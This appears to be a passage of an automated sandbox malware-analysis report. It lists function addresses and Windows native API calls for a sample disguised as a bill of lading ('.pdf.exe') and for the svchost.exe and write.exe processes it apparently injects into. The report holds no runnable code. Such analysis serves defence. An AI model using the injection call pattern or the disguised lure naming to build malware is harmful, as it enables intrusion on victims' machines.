            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CC0 NtQueryVirtualMemory | 1_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CF0 NtOpenProcess | 1_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72CA0 NtQueryInformationToken | 1_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C60 NtCreateKey | 1_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C72C00 NtQueryInformationProcess | 1_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73090 NtSetValueKey | 1_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73010 NtOpenDirectoryObject | 1_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C739B0 NtGetContextThread | 1_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D70 NtOpenThread | 1_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C73D10 NtOpenProcessToken | 1_2_03C73D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045735C0 NtCreateMutant,LdrInitializeThunk | 6_2_045735C0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04574650 NtSuspendThread,LdrInitializeThunk | 6_2_04574650
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04574340 NtSetContextThread,LdrInitializeThunk | 6_2_04574340
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572C70 NtFreeVirtualMemory,LdrInitializeThunk | 6_2_04572C70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572C60 NtCreateKey,LdrInitializeThunk | 6_2_04572C60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572CA0 NtQueryInformationToken,LdrInitializeThunk | 6_2_04572CA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572D10 NtMapViewOfSection,LdrInitializeThunk | 6_2_04572D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572D30 NtUnmapViewOfSection,LdrInitializeThunk | 6_2_04572D30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572DD0 NtDelayExecution,LdrInitializeThunk | 6_2_04572DD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572DF0 NtQuerySystemInformation,LdrInitializeThunk | 6_2_04572DF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572EE0 NtQueueApcThread,LdrInitializeThunk | 6_2_04572EE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572E80 NtReadVirtualMemory,LdrInitializeThunk | 6_2_04572E80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572F30 NtCreateSection,LdrInitializeThunk | 6_2_04572F30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572FE0 NtCreateFile,LdrInitializeThunk | 6_2_04572FE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572FB0 NtResumeThread,LdrInitializeThunk | 6_2_04572FB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_045739B0 NtGetContextThread,LdrInitializeThunk | 6_2_045739B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572AD0 NtReadFile,LdrInitializeThunk | 6_2_04572AD0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572AF0 NtWriteFile,LdrInitializeThunk | 6_2_04572AF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572B60 NtClose,LdrInitializeThunk | 6_2_04572B60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 6_2_04572BF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572BE0 NtQueryValueKey,LdrInitializeThunk | 6_2_04572BE0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572BA0 NtEnumerateValueKey,LdrInitializeThunk | 6_2_04572BA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04573010 NtOpenDirectoryObject | 6_2_04573010
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04573090 NtSetValueKey | 6_2_04573090
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572C00 NtQueryInformationProcess | 6_2_04572C00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572CC0 NtQueryVirtualMemory | 6_2_04572CC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572CF0 NtOpenProcess | 6_2_04572CF0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04573D70 NtOpenThread | 6_2_04573D70
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04573D10 NtOpenProcessToken | 6_2_04573D10
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572D00 NtSetInformationFile | 6_2_04572D00
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572DB0 NtEnumerateKey | 6_2_04572DB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572E30 NtWriteVirtualMemory | 6_2_04572E30
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572EA0 NtAdjustPrivilegesToken | 6_2_04572EA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572F60 NtCreateProcessEx | 6_2_04572F60
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572F90 NtProtectVirtualMemory | 6_2_04572F90
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572FA0 NtQuerySection | 6_2_04572FA0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572AB0 NtWaitForSingleObject | 6_2_04572AB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_04572B80 NtQueryInformationFile | 6_2_04572B80
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023D9050 NtClose | 6_2_023D9050
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023D91B0 NtAllocateVirtualMemory | 6_2_023D91B0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023D8EC0 NtReadFile | 6_2_023D8EC0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023D8FB0 NtDeleteFile | 6_2_023D8FB0
            Source: C:\Windows\SysWOW64\write.exe | Code function: 6_2_023D8D50 NtCreateFile | 6_2_023D8D50
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle | 0_2_00434D50
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_004461ED
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 0_2_004364AA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00412038 | 0_2_00412038
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0047E1FA | 0_2_0047E1FA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0041A46B | 0_2_0041A46B
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0041240C | 0_2_0041240C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004045E0 | 0_2_004045E0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00412818 | 0_2_00412818
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0047CBF0 | 0_2_0047CBF0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0044EBBC | 0_2_0044EBBC
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00412C38 | 0_2_00412C38
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0044ED9A | 0_2_0044ED9A
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00424F70 | 0_2_00424F70
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0041AF0D | 0_2_0041AF0D
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00427161 | 0_2_00427161
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004212BE | 0_2_004212BE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00443390 | 0_2_00443390
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00443391 | 0_2_00443391
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0041D750 | 0_2_0041D750
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_004037E0 | 0_2_004037E0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00427859 | 0_2_00427859
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0040F890 | 0_2_0040F890
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_0042397B | 0_2_0042397B
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00409A40 | 0_2_00409A40
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00411B63 | 0_2_00411B63
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_00423EBF | 0_2_00423EBF
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe | Code function: 0_2_04023A38 | 0_2_04023A38
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418583 | 1_2_00418583
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00410003 | 1_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040282F | 1_2_0040282F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402830 | 1_2_00402830
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040E083 | 1_2_0040E083
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403210 | 1_2_00403210
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EAF3 | 1_2_0042EAF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402CDC | 1_2_00402CDC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402CE0 | 1_2_00402CE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004025C0 | 1_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FDDB | 1_2_0040FDDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FDE3 | 1_2_0040FDE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041674F | 1_2_0041674F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416753 | 1_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4E3F0 | 1_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D003E6 | 1_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFA352 | 1_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC02C0 | 1_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 | 1_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF81CC | 1_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF41A2 | 1_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D001AA | 1_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC8158 | 1_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30100 | 1_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDA118 | 1_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD2000 | 1_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3C7C0 | 1_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C64750 | 1_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40770 | 1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5C6E0 | 1_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D00591 | 1_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40535 | 1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEE4F6 | 1_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF2446 | 1_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE4420 | 1_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF6BD7 | 1_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFAB40 | 1_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3EA80 | 1_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C429A0 | 1_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0A9A6 | 1_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C56962 | 1_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C6E8F0 | 1_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C268B8 | 1_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4A840 | 1_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C42840 | 1_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C32FC8 | 1_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CBEFA0 | 1_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB4F40 | 1_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C82F28 | 1_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C60F30 | 1_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE2F30 | 1_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEEDB | 1_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C52E90 | 1_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFCE93 | 1_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40E59 | 1_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFEE26 | 1_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3ADE0 | 1_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C58DBF | 1_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4AD00 | 1_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDCD1F | 1_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C30CF2 | 1_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0CB5 | 1_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C40C00 | 1_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C8739A | 1_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2D34C | 1_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF132D | 1_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5B2C0 | 1_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE12ED | 1_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C5D2F0 | 1_2_03C5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C452A0 | 1_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C4B1B0 | 1_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7516C | 1_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2F172 | 1_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0B16B | 1_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEF0CC | 1_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C470C0 | 1_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF70E9 | 1_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF0E0 | 1_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF7B0 | 1_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF16CC | 1_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C85630 | 1_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D095C3 | 1_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDD5B0 | 1_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF7571 | 1_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C31460 | 1_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CFF43F | 1_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B14E785_2_05B14E78
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1D5955_2_05B1D595
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1D5995_2_05B1D599
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16C215_2_05B16C21
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16C295_2_05B16C29
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B14EC95_2_05B14EC9
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16E495_2_05B16E49
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B359395_2_05B35939
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1F3C95_2_05B1F3C9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F24466_2_045F2446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045314606_2_04531460
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF43F6_2_045FF43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EE4F66_2_045EE4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F75716_2_045F7571
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045405356_2_04540535
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DD5B06_2_045DD5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046005916_2_04600591
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F16CC6_2_045F16CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455C6E06_2_0455C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045647506_2_04564750
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045407706_2_04540770
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453C7C06_2_0453C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF7B06_2_045FF7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EF0CC6_2_045EF0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045470C06_2_045470C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F70E96_2_045F70E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF0E06_2_045FF0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045C81586_2_045C8158
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0460B16B6_2_0460B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452F1726_2_0452F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0457516C6_2_0457516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DA1186_2_045DA118
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045301006_2_04530100
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F81CC6_2_045F81CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046001AA6_2_046001AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454B1B06_2_0454B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E02746_2_045E0274
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455B2C06_2_0455B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455D2F06_2_0455D2F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E12ED6_2_045E12ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045452A06_2_045452A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FA3526_2_045FA352
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452D34C6_2_0452D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F132D6_2_045F132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046003E66_2_046003E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454E3F06_2_0454E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0458739A6_2_0458739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04540C006_2_04540C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B9C326_2_045B9C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04530CF26_2_04530CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFCF26_2_045FFCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E0CB56_2_045E0CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F1D5A6_2_045F1D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04543D406_2_04543D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F7D736_2_045F7D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454AD006_2_0454AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455FDC06_2_0455FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453ADE06_2_0453ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04558DBF6_2_04558DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04540E596_2_04540E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FEE266_2_045FEE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FEEDB6_2_045FEEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04552E906_2_04552E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FCE936_2_045FCE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04549EB06_2_04549EB0
